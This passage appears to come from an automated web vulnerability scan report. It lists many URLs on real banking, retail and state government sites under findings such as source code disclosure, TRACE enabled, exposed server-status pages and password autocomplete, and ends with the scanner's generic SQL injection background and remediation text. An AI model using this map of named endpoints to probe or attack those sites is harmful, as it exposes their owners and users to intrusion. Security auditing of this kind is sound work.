11.241. http://www.jpmorgan.com/images/menu_tab_left.jpg

11.242. http://www.jpmorgan.com/images/menu_tab_right.jpg

11.243. http://www.jpmorgan.com/images/more_services_arrow.gif

11.244. http://www.jpmorgan.com/images/navbar_leftcorner.gif

11.245. http://www.jpmorgan.com/images/navbar_map.gif

11.246. http://www.jpmorgan.com/images/navbar_rightcorner2.gif

11.247. http://www.jpmorgan.com/images/news_buttons.jpg

11.248. http://www.jpmorgan.com/images/news_gradient_cell.jpg

11.249. http://www.jpmorgan.com/images/print_grey.gif

11.250. http://www.jpmorgan.com/images/scnd_body_arrow.gif

11.251. http://www.jpmorgan.com/images/scnd_client_logon.jpg

11.252. http://www.jpmorgan.com/images/scnd_client_pixel.jpg

11.253. http://www.jpmorgan.com/images/scnd_menu_tab.jpg

11.254. http://www.jpmorgan.com/images/scnd_menu_tab_left.jpg

11.255. http://www.jpmorgan.com/images/scnd_more_services_arrow.gif

11.256. http://www.jpmorgan.com/images/scnd_onstate_arrow.jpg

11.257. http://www.jpmorgan.com/images/scnd_tab_bar_pixel.jpg

11.258. http://www.jpmorgan.com/images/scnd_vert_dottedline.gif

11.259. http://www.jpmorgan.com/images/scnd_wht_bkg.jpg

11.260. http://www.jpmorgan.com/images/thrd_client_tab_left2.jpg

11.261. http://www.jpmorgan.com/images/thrd_client_tab_right2.jpg

11.262. http://www.jpmorgan.com/images/thrd_subnav_arrow.gif

11.263. http://www.jpmorgan.com/images/thrd_subnav_dottedline.jpg

11.264. http://www.jpmorgan.com/images/thumb_am_62.jpg

11.265. http://www.jpmorgan.com/images/thumb_cb_62.jpg

11.266. http://www.jpmorgan.com/images/thumb_ib_62.jpg

11.267. http://www.jpmorgan.com/images/thumb_pb_62.jpg

11.268. http://www.jpmorgan.com/images/thumb_ts_62.jpg

11.269. http://www.jpmorgan.com/images/thumb_wss_62.jpg

11.270. http://www.jpmorgan.com/images/ts/images_2008/background_subpage.jpg

11.271. http://www.jpmorgan.com/images/ts/images_2008/footer_pixel.gif

11.272. http://www.jpmorgan.com/images/ts/images_2008/logo_jpm.gif

11.273. http://www.jpmorgan.com/images/ts/images_2008/navbar_map.gif

11.274. http://www.jpmorgan.com/images/ts/images_2008/scnd_body_arrow.gif

11.275. http://www.jpmorgan.com/images/ts/images_2008/scnd_menu_tab.jpg

11.276. http://www.jpmorgan.com/images/ts/images_2008/scnd_menu_tab_left.jpg

11.277. http://www.jpmorgan.com/images/ts/images_2008/scnd_onstate_arrow.jpg

11.278. http://www.jpmorgan.com/images/ts/images_2008/scnd_tab_bar_pixel.jpg

11.279. http://www.jpmorgan.com/images/ts/images_2008/thrd_client_tab_left2.jpg

11.280. http://www.jpmorgan.com/images/ts/images_2008/thrd_client_tab_right2.jpg

11.281. http://www.jpmorgan.com/images/ts/images_2008/thrd_subnav_arrow.gif

11.282. http://www.jpmorgan.com/images/ts/images_2008/thrd_subnav_dottedline.jpg

11.283. http://www.jpmorgan.com/images/ts/imgs/icon_arrow_up.gif

11.284. http://www.jpmorgan.com/images/ts/js/global.js

11.285. http://www.jpmorgan.com/pages/jpmorgan/am

11.286. http://www.jpmorgan.com/pages/jpmorgan/am/mediaboxarticles/WhyJPMAM

11.287. http://www.jpmorgan.com/pages/jpmorgan/am/uk

11.288. http://www.jpmorgan.com/pages/jpmorgan/am/uk/press_office

11.289. http://www.jpmorgan.com/pages/jpmorgan/am/uk/press_office/global-equity-absolute-alpha-fund-launched

11.290. http://www.jpmorgan.com/pages/jpmorgan/am/usa

11.291. http://www.jpmorgan.com/pages/jpmorgan/clientlogon

11.292. http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx

11.293. http://www.jpmorgan.com/pages/jpmorgan/private_banking

11.294. http://www.jpmorgan.com/script/jpmVideoPlayerHelper.js

11.295. http://www.jpmorgan.com/script/jquery-1.2.6.min.js

11.296. http://www.jpmorgan.com/script/jquery-1.3.2.min.js

11.297. http://www.jpmorgan.com/script/jquery.bgiframe.min.js

11.298. http://www.jpmorgan.com/script/jquery.pngFix.pack.js

11.299. http://www.jpmorgan.com/script/jquery_jpm_custom.js

11.300. http://www.jpmorgan.com/script/lightbox_support/builder.js

11.301. http://www.jpmorgan.com/script/lightbox_support/controls.js

11.302. http://www.jpmorgan.com/script/lightbox_support/dragdrop.js

11.303. http://www.jpmorgan.com/script/lightbox_support/effects.js

11.304. http://www.jpmorgan.com/script/lightbox_support/prototype.js

11.305. http://www.jpmorgan.com/script/lightbox_support/scriptaculous.js

11.306. http://www.jpmorgan.com/script/lightbox_support/slider.js

11.307. http://www.jpmorgan.com/script/lightbox_support/sound.js

11.308. http://www.jpmorgan.com/script/lightview.js

11.309. http://www.jpmorgan.com/script/swfobject.js

11.310. http://www.jpmorgan.com/tss/General/ACH_Fraud_Solutions/1159383343594

11.311. http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702

11.312. http://www.jpmorgan.com/tss/Product_A-Z/Products_and_Solutions/1104848729254

11.313. http://www.lowes.com/

11.314. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_appliances.png

11.315. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_grills.png

11.316. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_ope.png

11.317. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_patiofurniture.png

11.318. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110608_area5b_laptopimg.png

11.319. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110616_area6b_BeatTheHeat.png

11.320. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area2_PatioNLP.jpg

11.321. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area3_cooling.png

11.322. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area3_decking.png

11.323. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area4_vanity.png

11.324. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_control_PatioNLP.png

11.325. http://www.lowes.com/campaign/summer/2011/images/homepage/20110622_area5_background.jpg

11.326. http://www.lowes.com/campaign/summer/2011/images/homepage/20110705_area4_Clearance.png

11.327. http://www.lowes.com/campaign/summer/2011/images/homepage/20110705_area5_GiftCards.png

11.328. http://www.lowes.com/campaign/summer/2011/images/homepage/20110706_control_Flooring.png

11.329. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area2_Flooring.jpg

11.330. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area2_Refrigeration.jpg

11.331. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_Bali.png

11.332. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_OPE.png

11.333. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_Shutters.png

11.334. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area4_Tools.png

11.335. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_area6b_Organization.png

11.336. http://www.lowes.com/campaign/summer/2011/images/homepage/20110712_control_Refrigeration.png

11.337. http://www.lowes.com/campaign/summer/2011/images/homepage/arrow_status.png

11.338. http://www.lowes.com/campaign/summer/2011/images/homepage/bullet.png

11.339. http://www.lowes.com/campaign/summer/2011/images/homepage/green_background.png

11.340. http://www.lowes.com/images/auxnav/auxnavbg.png

11.341. http://www.lowes.com/images/bg-category-li.gif

11.342. http://www.lowes.com/images/bg-page.gif

11.343. http://www.lowes.com/images/blank.gif

11.344. http://www.lowes.com/images/category-corner.png

11.345. http://www.lowes.com/images/category-right-cover.gif

11.346. http://www.lowes.com/images/cover.gif

11.347. http://www.lowes.com/images/sprites/buttons.png

11.348. http://www.lowes.com/images/sprites/global.png

11.349. http://www.lowes.com/pc_Flooring_4294934373_4294937087_

11.350. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/global/global-min.css

11.351. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/global/ie/ie-min.css

11.352. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/homepage/homepage-min.css

11.353. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/homepage/ie/ie-min.css

11.354. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/ie6-1.0.5.css

11.355. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/ie6-print.css

11.356. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/ie6.css

11.357. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main-1.0.5.css

11.358. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css

11.359. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/print.css

11.360. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/images/lowes_logo.gif

11.361. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/global/global-min.js

11.362. http://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm

11.363. https://www.lowes.com/server-status

11.364. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css

11.365. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js

11.366. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo-ext-lowes.js

11.367. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/dojo/dojo.js

11.368. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/globalNavIE.js

11.369. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

11.370. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm

11.371. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm

11.372. http://www.ox.popcap.com/delivery/afr.php

11.373. https://www.ri.gov/Licensing/renewal/license.php

11.374. http://www.uscg.mil/safetylevels/levels.js

11.375. http://www7.lowes.com/eluminate

11.376. http://www7.lowes.com/eluminate

12. Password field with autocomplete enabled

12.1. https://admin.ccbill.com/loginMM.cgi

12.2. https://affiliateadmin.ccbill.com/

12.3. http://apps.ccbill.com/

12.4. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html

12.5. http://apps.ccbill.com/p/developer.html

12.6. https://chaseonline.chase.com/Public/Reidentify/ReidentifyFilterView.aspx

12.7. https://store.popcap.com/payment.php

12.8. https://store.popcap.com/payment.php

12.9. https://store.popcap.com/payment.php

12.10. http://twitter.com/

12.11. http://twitter.com/

12.12. http://twitter.com/

12.13. http://ucc.state.ri.us/loginsystem/login_form.asp

12.14. http://www.citizencorps.gov/

12.15. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm

13. Source code disclosure

13.1. http://platform.linkedin.com/js/nonSecureAnonymousFramework

13.2. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/AJAXUserInterface/javascript/Common.js

13.3. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js

13.4. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js

13.5. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowes.js

13.6. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/lowesjs/memberGroup.js

14. Referer-dependent response

14.1. https://admin.ccbill.com/style/css/images/text-bg.gif

14.2. http://bstats.adbrite.com/click/bstats.gif

14.3. http://www.facebook.com/plugins/like.php

14.4. http://www.facebook.com/plugins/likebox.php

14.5. http://www.youtube.com/embed/IHmPw1HsCe4

15. Cross-domain POST

15.1. http://www.dhs.gov/index.shtm

15.2. http://www.riusar.com/

16. Cross-domain Referer leakage

16.1. http://fls.doubleclick.net/activityi

16.2. http://fls.doubleclick.net/activityi

16.3. http://fls.doubleclick.net/activityi

16.4. http://itunes.apple.com/us/app/katango/id447742732

16.5. http://s2.wp.com/wp-content/mu-plugins/post-react-1/sharing/sharing.js

16.6. http://ucc.state.ri.us/loginsystem/login.asp

16.7. http://ucc.state.ri.us/ucc/uccmenu.asp

16.8. https://www.chase.com/ccp/index.jsp

16.9. https://www.chase.com/ccp/index.jsp

16.10. http://www.facebook.com/plugins/like.php

16.11. http://www.facebook.com/plugins/likebox.php

16.12. http://www.facebook.com/plugins/likebox.php

16.13. http://www.facebook.com/plugins/likebox.php

16.14. http://www.google.com/search

16.15. http://www.google.com/search

16.16. http://www.google.com/search

16.17. http://www.imiclk.com/cgi/r.cgi

16.18. http://www.imiclk.com/cgi/r.cgi

16.19. http://www.interactivemediaawards.com/winners/certificate.asp

16.20. http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx

16.21. http://www.lowes.com/

16.22. http://www.lowes.com/pc_Flooring_4294934373_4294937087_

16.23. https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm

16.24. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm

16.25. http://www.mass.gov/

16.26. http://www.mass.gov/

16.27. http://www.mass.gov/

16.28. http://www.ox.popcap.com/delivery/afr.php

16.29. https://www.ri.gov/information/

16.30. https://www.ri.gov/search/

16.31. https://www.ri.gov/visit/

17. Cross-domain script include

17.1. http://511.dot.ri.gov/hb/main.jsf

17.2. http://blog.katango.com/

17.3. http://blog.katango.com/2011/07/05/how-facebook-affects-your-relationships-infographic/

17.4. http://itunes.apple.com/us/app/katango/id447742732

17.5. https://store.popcap.com/payment.php

17.6. http://trustedcs.com/

17.7. http://trustedcs.com/SecurityBlanket/SecurityBlanket-FAQ.html

17.8. http://trustedcs.com/SecurityBlanket/SecurityBlanket.html

17.9. http://trustedcs.com/products/cross_domain.html

17.10. http://www.akqa.com/

17.11. http://www.akqa.com/approach

17.12. http://www.akqa.com/contact/san-francisco

17.13. http://www.akqa.com/library/js/akqa.devicemanager.js

17.14. http://www.akqa.com/work/volkswagen/real-racing-gti

17.15. http://www.akqa.com/work/warner-brothers/221b

17.16. http://www.ccbill.com/

17.17. http://www.ccbill.com/developers/faq.php

17.18. http://www.ccbill.com/developers/index.php

17.19. http://www.ccbill.com/developers/security/security-rewards-program.php

17.20. http://www.ccbill.com/developers/security/vulnerability-reward-program-participation.php

17.21. https://www.ccbill.com/developers/index.php

17.22. https://www.ccbill.com/developers/security/vulnerability-reward-registration.php

17.23. http://www.facebook.com/plugins/likebox.php

17.24. http://www.interactivemediaawards.com/winners/certificate.asp

17.25. http://www.jpmorgan.com/pages/jpmorgan/am/usa

17.26. http://www.jpmorganchase.com/corporate/Home/home.htm

17.27. http://www.ox.popcap.com/delivery/afr.php

17.28. http://www.ri.gov/press/view/14202

17.29. http://www.riema.ri.gov/

17.30. http://www.youtube.com/embed/IHmPw1HsCe4

17.31. http://www6.homedepot.com/how-to/index.html

18. TRACE method is enabled

18.1. http://bh.contextweb.com/

18.2. http://image2.pubmatic.com/

18.3. http://pixel.rubiconproject.com/

18.4. http://www.iavisarts.org/

19. Email addresses disclosed

19.1. https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome

19.2. https://admin.ccbill.com/ext-2.2/adapter/ext/ext-base.js

19.3. https://admin.ccbill.com/ext-2.2/custom/combos.css

19.4. https://admin.ccbill.com/ext-2.2/ext-all.js

19.5. https://admin.ccbill.com/ext-2.2/resources/css/ext-all.css

19.6. https://admin.ccbill.com/loginIndex.cgi

19.7. https://admin.ccbill.com/loginMM.cgi

19.8. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html

19.9. http://apps.ccbill.com/p/developer.html

19.10. http://apps.ccbill.com/tmp/cache/intelli.config.js

19.11. http://apps.ccbill.com/tmp/cache/intelli.lang.en.js

19.12. http://blog.katango.com/osd.xml

19.13. http://bstats.adbrite.com/click/bstats.gif

19.14. http://ec.ox.popcap.com/popcap/js/jquery/plugins/jquery.cookie.js

19.15. https://iblogin.jpmorgan.com/sso/action/federateLogin

19.16. https://iblogin.jpmorgan.com/sso/action/federateLogin

19.17. https://iblogin.jpmorgan.com/sso/action/web_ForgotUsername

19.18. https://iblogin.jpmorgan.com/sso/action/web_GetForgotUsername

19.19. https://iblogin.jpmorgan.com/sso/action/web_NeedHelp

19.20. http://ocsp.thawte.com/

19.21. http://sos.ri.gov/business/acknowledgements/

19.22. http://sos.ri.gov/business/filings/annualreports/

19.23. http://sos.ri.gov/business/filings/businessforms/

19.24. http://sos.ri.gov/elections/voters/register/

19.25. https://store.popcap.com/js/jquery/plugins/jquery.cookie.js

19.26. https://support.ccbill.com/

19.27. http://trustedcs.com/SecurityBlanket/SecurityBlanket-FAQ.html

19.28. http://trustedcs.com/SecurityBlanket/SecurityBlanket.html

19.29. http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp

19.30. http://ucc.state.ri.us/loginsystem/login_form.asp

19.31. http://www.211ri.org/js/prototype.js

19.32. http://www.akqa.com/contact/san-francisco

19.33. http://www.akqa.com/library/js/jquery.jqtransform-1.1.custom.min.js

19.34. http://www.ccbill.com/developers/security/vulnerability-reward-program-participation.php

19.35. https://www.chase.com/online/includes/javascript/jquery.url.js

19.36. http://www.citizencorps.gov/css/navDynamic.css

19.37. http://www.ct.gov/demhs/assets/templates/41/textsizer.js

19.38. http://www.ct.gov/demhs/site/default.asp

19.39. http://www.doit.ri.gov/directions/index.php

19.40. http://www.doit.ri.gov/news/projects/index.php

19.41. http://www.doit.ri.gov/search/index.php/

19.42. http://www.doit.ri.gov/search/index.php/captcha.php

19.43. http://www.fema.gov/css/text-styles.css

19.44. http://www.homedepot.com/lithium-handling.js

19.45. http://www.homedepot.com/static/scripts/jquery/jquery.pubsub.js

19.46. http://www.homedepot.com/wcsstore/hdus/scripts/DD_belatedPNG_0.0.8a-min.js

19.47. http://www.jpmorgan.com/pages/jpmorgan/am/uk/press_office/global-equity-absolute-alpha-fund-launched

19.48. http://www.jpmorgan.com/script/jquery.pngFix.pack.js

19.49. http://www.jpmorgan.com/script/lightbox_support/controls.js

19.50. http://www.jpmorganchase.com/corporate/includes/javascript/jScrollTouch.js

19.51. http://www.jpmorganchase.com/corporate/includes/javascript/jquery.cookie.js

19.52. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

19.53. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/niftycube.js

19.54. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm

19.55. http://www.popcap.com/js/jquery/plugins/jquery.cookie.js

19.56. http://www.ri.gov/js/fontsizer.js

19.57. http://www.ri.gov/js/jquery_cookie.js

19.58. http://www.ri.gov/opengovernment/

19.59. http://www.ri.gov/plugins/mozilla_search.xml

19.60. http://www.ri.gov/styles/ui-widgets.css

19.61. http://www.ri.gov/subscriber/

19.62. https://www.ri.gov/about/

19.63. https://www.ri.gov/about/staff.php

19.64. https://www.ri.gov/js/fontsizer.js

19.65. https://www.ri.gov/js/jquery_cookie.js

19.66. https://www.ri.gov/styles/ui-widgets.css

19.67. http://www.riema.ri.gov/contact/

19.68. http://www.riema.ri.gov/js/jquery.cdc.ticker.js

19.69. http://www.us-cert.gov/cas/tips/

20. Private IP addresses disclosed

20.1. http://blogs.adobe.com/psirt/

20.2. http://blogs.adobe.com/psirt/category/security-bulletins-and-advisories

20.3. http://blogs.adobe.com/psirt/category/uncategorized

20.4. https://iblogin.jpmorgan.com/sso/morcom/css/style.css

20.5. http://platform.ak.fbcdn.net/www/app_full_proxy.php

20.6. http://platform.ak.fbcdn.net/www/app_full_proxy.php

20.7. http://platform.ak.fbcdn.net/www/app_full_proxy.php

20.8. http://platform.ak.fbcdn.net/www/app_full_proxy.php

20.9. http://platform.ak.fbcdn.net/www/app_full_proxy.php

20.10. http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/LHnm6CafkJe.js

20.11. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/2YGnqSRbxUI.css

20.12. https://store.popcap.com/payment.php

20.13. http://www.facebook.com/ajax/connect/connect_widget.php

20.14. http://www.facebook.com/plugins/like.php

20.15. http://www.facebook.com/plugins/like.php

20.16. http://www.facebook.com/plugins/likebox.php

20.17. http://www.facebook.com/plugins/likebox.php

20.18. http://www.facebook.com/plugins/likebox.php

20.19. http://www.facebook.com/plugins/likebox.php

20.20. http://www.facebook.com/plugins/likebox.php

20.21. http://www.google.com/sdch/vD843DpA.dct

20.22. https://www.lowes.com/server-status

20.23. https://www.lowes.com/server-status

20.24. http://www.us-cert.gov/cas/tips/

21. Credit card numbers disclosed

22. Robots.txt file

22.1. http://1.gravatar.com/blavatar/183104b8582a0b2533f9416c5f5d53fe

22.2. https://admin.ccbill.com/

22.3. http://apps.ccbill.com/favicon.ico

22.4. http://at.amgdgt.com/ads/

22.5. http://b.scorecardresearch.com/b

22.6. http://blog.katango.com/

22.7. http://blogs.adobe.com/psirt/

22.8. http://gw-services.vtrenz.net/WebCookies/RegisterWebPageVisit.cfm

22.9. http://itunes.apple.com/WebObjects/MZStore.woa/wa/ajaxCache

22.10. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

22.11. http://maps.gstatic.com/intl/en_us/mapfiles/closedhand_8_8.cur

22.12. http://metrics.apple.com/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s11845888246316

22.13. http://mtrcs.popcap.com/b/ss/popcapcom/1/H.21/s25055282826069

22.14. http://pixel.mathtag.com/data/img

22.15. http://s.gravatar.com/js/gprofiles.js

22.16. http://s0.wp.com/wp-content/themes/h4/global.css

22.17. http://s1.wp.com/wp-includes/js/l10n.js

22.18. http://s2.wp.com/wp-content/mu-plugins/post-react-1/sharing/sharing.css

22.19. http://stats.adobe.com/b/ss/mxmacromedia/1/H.23.3/s22758062051143

22.20. http://tag.admeld.com/pixel

22.21. http://trustedcs.com/

22.22. http://www.apple.com/itunes

22.23. http://www.burstnet.com/enlightn/8171/99D2/

22.24. http://www.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536

22.25. http://www.imiclk.com/cgi/r.cgi

22.26. http://www.interactivemediaawards.com/winners/certificate.asp

22.27. http://www.lowes.com/

22.28. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm

22.29. http://www.ox.popcap.com/delivery/afr.php

22.30. http://www.popcap.com/favicon.ico

22.31. http://www.youtube.com/embed/IHmPw1HsCe4

22.32. http://www7.lowes.com/eluminate

23. Cacheable HTTPS response

23.1. https://access.jpmorgan.com/content/tssweb/shared/document/PP403.html

23.2. https://admin.ccbill.com/favicon.ico

23.3. https://admin.ccbill.com/loginIndex.cgi

23.4. https://admin.ccbill.com/loginMM.cgi

23.5. https://affiliateadmin.ccbill.com/

23.6. https://affiliateadmin.ccbill.com/favicon.ico

23.7. https://pwr.jpmorgan.com/pwreset/forgotp1.validateuserdsp.epr

23.8. https://pwr.jpmorgan.com/pwreset/forgotp1.validateusersubmit.epr

23.9. https://store.popcap.com/js/s_code.php

23.10. https://support.ccbill.com/

23.11. https://www.ccbill.com/developers/index.php

23.12. https://www.ccbill.com/developers/security/vulnerability-reward-registration.php

23.13. https://www.ccbill.com/favicon.ico

23.14. https://www.chase.com/

23.15. https://www.chase.com/ccp/index.jsp

23.16. https://www.chase.com/ccpmweb/shared/document/webtrends.html

23.17. https://www.chase.com/index.jsp

23.18. https://www.chase.com/online/Checking/gift-card.htm

23.19. https://www.chase.com/online/Home/article/Homepage_pixel_frameset.htm

23.20. https://www.chase.com/psmhelp/index.jsp

23.21. https://www.lowes.com/server-status

23.22. https://www.ri.gov/Licensing/

23.23. https://www.ri.gov/about/

23.24. https://www.ri.gov/about/awards.php

23.25. https://www.ri.gov/about/staff.php

23.26. https://www.ri.gov/government/

23.27. https://www.ri.gov/help/

23.28. https://www.ri.gov/img/favicon.ico

23.29. https://www.ri.gov/information/

23.30. https://www.ri.gov/phonebook/

23.31. https://www.ri.gov/policies/

23.32. https://www.ri.gov/policies/access/

23.33. https://www.ri.gov/policies/disclaimer/

23.34. https://www.ri.gov/policies/legal/

23.35. https://www.ri.gov/policies/links/

23.36. https://www.ri.gov/policies/privacy/

23.37. https://www.ri.gov/search/

23.38. https://www.ri.gov/towns/

23.39. https://www.ri.gov/type/junction_02-webfont.woff

23.40. https://www.ri.gov/visit/

24. Multiple content types specified

24.1. http://trustedcs.com/

24.2. http://trustedcs.com/SecurityBlanket/SecurityBlanket-FAQ.html

24.3. http://trustedcs.com/SecurityBlanket/SecurityBlanket.html

24.4. http://trustedcs.com/products/cross_domain.html

25. HTML does not specify charset

25.1. http://blastercorp.com/

25.2. http://fls.doubleclick.net/activityi

25.3. https://store.popcap.com/js/s_code.php

25.4. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp

25.5. http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp

25.6. http://ucc.state.ri.us/loginsystem/login_form.asp

25.7. http://ucc.state.ri.us/ucc/uccmenu.asp

25.8. http://wallst.jpmorganchase.com/chase/services/MultiQuote/MultiQuote.asp

25.9. https://www.chase.com/online/Home/article/Homepage_pixel_frameset.htm

25.10. http://www.citizencorps.gov/includes/facts.json

25.11. http://www.ct.gov/favicon.ico

25.12. http://www.homedepot.com/hdus/en_US/DTCCOM/HomePage/Fragments/BB_Hero.htm

25.13. http://www.interactivemediaawards.com/favicon.ico

25.14. http://www.jpmorgan.com/

25.15. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/Mexico/img/back_content.png

25.16. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/Mexico/img/bk_menu_bt_over.jpg

25.17. https://www.lowes.com/MContent/Structured/MastheadArea/help_center/my_profile.html

25.18. https://www.lowes.com/MContent/Structured/MastheadArea/projects/bath.html

25.19. https://www.lowes.com/MContent/Structured/MastheadArea/projects/kitchen.html

25.20. https://www.lowes.com/MContent/Structured/MastheadArea/projects/laundry.html

25.21. http://www.popcap.com/js/s_code.php

25.22. http://www.readability.com/embed.js

25.23. http://www.readability.com/static/embed/embed.html

25.24. http://www2.tmc.state.ri.us/

26. HTML uses unrecognised charset

27. Content type incorrectly stated

27.1. http://apps.ccbill.com/favicon.ico

27.2. http://apps.ccbill.com/includes/common/category-icons/default.gif

27.3. http://ext.homedepot.com/www/esi/external/include.php

27.4. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

27.5. http://maps.gstatic.com/intl/en_us/mapfiles/closedhand_8_8.cur

27.6. http://sr2.liveperson.net/hcp/html/mTag.js

27.7. https://store.popcap.com/js/s_code.php

27.8. http://wallst.jpmorganchase.com/chase/services/MultiQuote/MultiQuote.asp

27.9. http://www.ccbill.com/favicon.ico

27.10. http://www.ccbill.com/signup/trans.cgi

27.11. https://www.ccbill.com/favicon.ico

27.12. http://www.citizencorps.gov/includes/facts.json

27.13. http://www.doit.ri.gov/favicon.ico

27.14. http://www.google.com/search

27.15. http://www.homedepot.com/businessControlledFragments/htmls/TypeAhead-min.json

27.16. http://www.homedepot.com/hdus/en_US/DTCCOM/HomePage/Images/white_space_10px.gif

27.17. http://www.homedepot.com/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/Homepage_js.json

27.18. http://www.homedepot.com/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/hero_slider.json

27.19. http://www.homedepot.com/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/lithium-handling.json

27.20. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/arrow_cta.png

27.21. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/clear.png

27.22. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange-square.png

27.23. http://www.homedepot.com/wcsstore/hdus/en_US/styles/businessjs.json

27.24. http://www.jpmorgan.com/cm/BlobServer

27.25. http://www.jpmorgan.com/cm/Satellite

27.26. http://www.jpmorgan.com/favicon.ico

27.27. http://www.lowes.com/campaign/summer/2011/images/homepage/20110622_area5_background.jpg

27.28. http://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/Mexico/js/ContenidoMenu.js

27.29. https://www.lowes.com/MContent/Structured/MastheadArea/help_center/my_profile.html

27.30. http://www.mass.gov/favicon.ico

27.31. http://www.popcap.com/js/s_code.php

27.32. http://www.readability.com/embed.js

27.33. http://www.res-x.com/ws/r2/Resonance.aspx

27.34. http://www.ri.gov/favicon.ico

27.35. http://www.ri.gov/img/favicon.ico

27.36. http://www.ri.gov/img/governmentbox/seal.gif

27.37. http://www.ri.gov/type/junction_02-webfont.woff

27.38. https://www.ri.gov/img/favicon.ico

27.39. https://www.ri.gov/type/junction_02-webfont.woff

27.40. http://www.riema.ri.gov/favicon.ico

27.41. http://www.us-cert.gov/favicon.ico

27.42. http://www6.homedepot.com/favicon.ico

27.43. http://www6.homedepot.com/how-to/assets/images/modal/lightbox-close.png



1. SQL injection  next
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

